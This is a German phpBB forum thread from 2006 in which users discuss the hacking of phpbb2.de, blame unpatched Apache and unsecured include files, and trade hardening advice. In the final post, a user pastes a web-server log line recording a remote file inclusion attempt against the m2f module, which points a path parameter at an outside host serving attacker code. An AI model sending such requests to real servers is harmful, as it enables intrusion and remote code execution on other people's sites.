Seite 1 von 1
phpbb2 hacked ???
Verfasst: Di 18.Jul, 2006 07:30
von diegoriv
Habe eben versucht phpbb2 abzurufen und das Ergebnis ist nicht sonderlich erfreulich.
http://www.phpbb2.de
Hoffentlich erfahren wir, wie das passiert ist. Da war doch der cracker tracker installiert, oder??
edit:// so nebstbei hab ich nämlich seit gestern auch wieder eine mittlere Angriffswelle (keine Vergleich zu oxpus oder cback, aber dennoch genug für meine kleine Seite.
Verfasst: Di 18.Jul, 2006 08:13
von cback
Jo aber ungesicherte Include Files und veralteter Apache.
Und ich habs noch gesagt als sie mit dem Server neu installiert haben. ¦4 ¦4
Verfasst: Di 18.Jul, 2006 09:22
von oxpus
Nun, der alte Apache ist vom Provider entgegen der Bestellung installiert worden(!), der Rest ist Stephan gewesen, der nicht gehört hatte...
Verfasst: Di 18.Jul, 2006 10:52
von KaptnIGLO
[quote="cback";p="61935"]Jo aber ungesicherte Include Files und veralteter Apache.
[/quote]
Wie kann ich die sichern? per .htaccess oder gibts im ctracker noch ne Einstellung die ich übersehen habe. Bis auf die phpVersion die noch bei 4.1.1 liegt ist bei mir alles grün.
Verfasst: Di 18.Jul, 2006 11:02
von oxpus
Schau mal in Cbacks Blog (Link in seiner SIG). Dort ist alles beschrieben.
Und mein Motto:
Traue keinem MOD, der nicht regelmässig aktualisiert wird, sofern er etwas komplexer ist.
Ich habe daher auch schon so manchen MOD des Boards verbannt; die KB allen voran, da sie neben zahlreichen Bugs auch noch sehr viele Sicherheitslücken hat. Und sooooo dringend brauchte ich die auch nicht
Verfasst: Di 18.Jul, 2006 11:25
von Titus
wie heist es so schön "der Schuster hat immer die schlechtesten Leisten"
ist der Server eigentlich managed? (da du schreibst entgegen der Bestellung)
Verfasst: Di 18.Jul, 2006 11:41
von oxpus
Nein, voller Root. Nur Stephan hatte den zuletzt neu installieren "lassen". War bequemer...
Verfasst: Di 18.Jul, 2006 13:55
von cback
Ich hätt schnell nen neuen Apache gebacken.
Verfasst: Di 18.Jul, 2006 14:05
von oxpus
Tja, Du, ich, er hat die nur angeschrieben. Und bislang ohne Erfolg...
Verfasst: Di 18.Jul, 2006 15:38
von cback
Öhm o.O Root Server!
Mit Debian sogar?
Wieso dann hoster anschreiben?
Rein in die Konsole,
Code: Alles auswählen
apt-get install apache2-mpm-prefork libapache2-mod-perl2 libapache2-mod-php4 mysql-client-4.1 mysql-server-4.1 libmysqlclient10 libmysqlclient12 libmysqlclient14 php4 php4-cgi php4-cli php4-pear php4-mysql phpmyadmin php4-gd libgd2
fertig
Bzw apt-get update glaub ich für ein Updatevorgang müsste man mal den dafür verwendeten Befehl gucken, bin kein Debian Anwender.
Verfasst: Di 18.Jul, 2006 15:43
von Giga4000
Seite ist wieder online
Verfasst: Di 18.Jul, 2006 16:00
von cback
Und es war tatsächlich das Modul was Heise.de vermutete
Verfasst: Do 03.Aug, 2006 14:15
von Dungeonwatcher
Hi große Meister!
Heute gab's doch tatsächlich diverse Versuche mein Forum mit Hilfe dieses Mods zu hacken. Da ich dieses Modul jedoch nicht nutze, gab's nur 404er Meldungen zurück.
90.Red-81-35-151.dynamicIP.rima-tde.net - - [03/Aug/2006:07:42:55 +0000] "GET /forum/m2f/m2f_forum.php?m2f_root_path=
http://xargonu.evonet.ro/htl.html? HTTP/1.0"
404 - "" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.0.1) Gecko/20020823 Netscap"
Die Profis mögen sich mal
diese Seite anschauen, welche versucht wurde aufzurufen.
Bye/2